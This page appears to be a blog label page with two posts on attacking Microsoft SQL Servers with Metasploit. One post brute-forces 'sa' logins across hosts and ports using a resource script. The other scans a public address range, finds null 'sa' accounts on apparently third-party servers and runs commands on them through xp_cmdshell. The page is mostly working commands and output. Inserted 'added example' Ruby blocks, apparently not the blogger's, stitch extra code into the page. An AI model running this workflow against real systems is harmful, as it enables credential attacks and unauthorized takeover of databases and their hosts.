Showing posts with label mssql_ping.

Thursday, January 3, 2013

MSSQL Brute forcing with Resource Scripts

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers: 
    SEVERNAME1\SQL2000
    SEVERNAME2\SQL2005

OSQL gives you a list of hostnames; we need to turn those hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to resolve a list of hostnames and turn them into IP addresses.


msf  post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed


With a list of IP addresses, run mssql_ping:


msf  auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+]    InstanceName    = MSSQLSERVER
[+]    IsClustered     = No
[+]    tcp             = 1433
[+]    np              = \\servername1\pipe\sql\query
[+]    Version         = 8.00.194
[+]    ServerName      = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+]    InstanceName    = INSTANCE1
[+]    IsClustered     = Yes
[+]    tcp             = 2261
[+]    np              = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+]    Version         = 10.50.1600.1
[+]    ServerName      = SEVERNAME2


Now we can pull the tcp ports out of the db with a query and have the resource script set RHOSTS and RPORT for you per entry. weeeeeee

the query (it lives inside the <ruby> block of the resource script):

hosts = []
framework.db.services.each do |service|
  # keep only open TCP services the db recorded as MSSQL (this is what mssql_ping stores)
  if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
    hosts << {'ip' => service.host.address, 'port' => service.port}
  end
end

We can use that query to populate RHOSTS and RPORT on the fly for us.

example:


[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resource directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource
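As an added example (not the post's mssql_brute.rb and not Metasploit code), this is the same selection logic the db query performs, run against a constructed stand-in for framework.db.services, followed by the per-entry command list a resource script would hand to run_single. The DbHost/DbService structs, the sample rows and the helper names are assumptions made for this example.

```ruby
# Constructed stand-in for framework.db.services after mssql_ping has
# populated the db (a few Struct rows, not a live Metasploit database).
DbHost    = Struct.new(:address)
DbService = Struct.new(:host, :port, :proto, :state, :name)

SAMPLE_SERVICES = [
  DbService.new(DbHost.new('192.168.237.197'), 1433, 'tcp', 'open',   'mssql'),
  DbService.new(DbHost.new('192.168.237.211'), 2261, 'tcp', 'open',   'mssql'),
  DbService.new(DbHost.new('192.168.237.211'), 1434, 'udp', 'open',   'mssql-m'), # browser, not a login port
  DbService.new(DbHost.new('192.168.237.197'),  445, 'tcp', 'open',   'smb'),
  DbService.new(DbHost.new('192.168.237.250'), 1433, 'tcp', 'closed', 'mssql'),
  DbService.new(DbHost.new('192.168.237.197'), 1433, 'tcp', 'open',   'mssql'), # duplicate row
]

# Mirrors the query on the page: name matches /mssql/i, state open, proto tcp.
# The proto check matters because the UDP browser service name also matches.
def mssql_targets(services)
  services.select { |s| s.name =~ /mssql/i && s.state == 'open' && s.proto == 'tcp' }
          .map    { |s| { 'ip' => s.host.address, 'port' => s.port } }
          .uniq
end

# The console commands emitted for each entry, so RHOSTS and RPORT never
# have to be edited by hand (option values as in the run shown above).
def login_commands(targets, userpass_file)
  targets.flat_map do |t|
    ['use auxiliary/scanner/mssql/mssql_login',
     "set USERPASS_FILE #{userpass_file}",
     "set RHOSTS #{t['ip']}",
     "set RPORT #{t['port']}",
     'set BRUTEFORCE_SPEED 2',
     'set BLANK_PASSWORDS false',
     'set USER_AS_PASS false',
     'run']
  end
end

# Inside a real .rc file each line would go to run_single(line); here we print.
if __FILE__ == $0
  login_commands(mssql_targets(SAMPLE_SERVICES), '/opt/framework/mssql2.txt').each { |l| puts l }
end
```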


UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234

Sunday, September 9, 2007

old school 0wning MSSQL --fun from the field

rule #1 don't expose your database to the world

rule #2 don't have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

Run those hosts that respond through the msf auxiliary module mssql_ping to see if we can get any version information. I'll omit the ones that didn't respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
THREADS  1                yes       The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
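As an added example (not from the post and not Metasploit's own module code): the listing mssql_ping prints in both posts comes from a single SQL Server Browser (UDP/1434) reply, and this parser shows how the fields are recovered from it. The datagram is constructed inline to mirror the values above; the 0x05 / length / ";"-separated record layout is the SSRP SVR_RESP format as assumed here.

```ruby
# Constructed SVR_RESP body: one ";;"-terminated record per instance,
# each a flat list of key;value pairs (values mirror the page's output).
RECORDS = 'ServerName;SEVERNAME2;InstanceName;MSSQLSERVER;IsClustered;No;' \
          'Version;8.00.194;tcp;1433;np;\\\\servername2\\pipe\\sql\\query;;' \
          'ServerName;SEVERNAME2;InstanceName;INSTANCE1;IsClustered;Yes;' \
          'Version;10.50.1600.1;tcp;2261;np;\\\\servername2\\pipe\\MSSQL$INSTANCE1\\sql\\query;;'
# SVR_RESP layout: 0x05, 16-bit little-endian length, then the record text.
SAMPLE_RESP = [0x05, RECORDS.bytesize].pack('Cv') + RECORDS

# Returns one hash per instance, e.g. {'InstanceName'=>'MSSQLSERVER','tcp'=>'1433',...}.
def parse_ssrp_response(datagram)
  raise ArgumentError, 'not an SVR_RESP packet' unless datagram.getbyte(0) == 0x05
  len  = datagram[1, 2].unpack1('v')
  body = datagram[3, len] || ''
  raise ArgumentError, 'truncated SVR_RESP' if body.bytesize < len
  body.split(';;').reject(&:empty?).map do |rec|
    fields = rec.split(';')
    raise ArgumentError, 'odd field count in record' if fields.length.odd?
    Hash[fields.each_slice(2).to_a]
  end
end

# TCP endpoints worth recording per host; instances published without a tcp
# entry (named pipes only) are skipped rather than mis-recorded on 1433.
def tcp_endpoints(host, instances)
  instances.select { |i| i['tcp'] }.map { |i| "#{host}:#{i['tcp']}" }
end

if __FILE__ == $0
  parse_ssrp_response(SAMPLE_RESP).each do |inst|
    inst.each { |k, v| puts "#{k.ljust(14)} = #{v}" }
  end
end
```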

Now, let's run them through mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    1433             yes       The target port
THREADS  1                yes       The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

Then let's use sqlcmd to see if we can get a command shell on the box. sqlcmd uses xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Conexão local:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador Ethernet Conexão de rede sem fio:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador PPP POP:
Sufixo DNS específico de conexão. :
Endereço IP . . . . . . . . . . . . : A.B.X.28
Máscara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padrão. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.5
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.6
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some old school year-2000-style tftp-upload-your-tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG